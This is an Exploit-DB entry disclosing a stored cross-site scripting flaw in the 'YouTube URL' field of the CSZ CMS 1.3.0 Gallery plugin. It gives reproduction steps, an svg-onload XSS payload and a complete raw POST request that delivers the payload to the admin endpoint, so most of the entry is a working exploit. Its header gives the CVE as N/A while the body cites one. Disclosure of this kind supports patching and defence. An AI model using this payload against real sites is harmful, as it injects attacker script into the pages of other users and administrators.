CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')

EDB-ID:

51704

CVE:

N/A




Platform:

PHP

Date:

2023-09-04


# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')
# Date: 2023/08/18
# CVE: CVE-2023-38911
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery.

# Steps to reproduce Stored XSS:

Go to url http://localhost/admin/plugin/gallery/edit/2.

When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2]
We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields.

With the following payload we can achieve the XSS

Payload:

<div><p title="</div><svg/onload=alert(document.domain)>">


#PoC Request:

POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/plugin/gallery/edit/2
Upgrade-Insecure-Requests: 1

gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add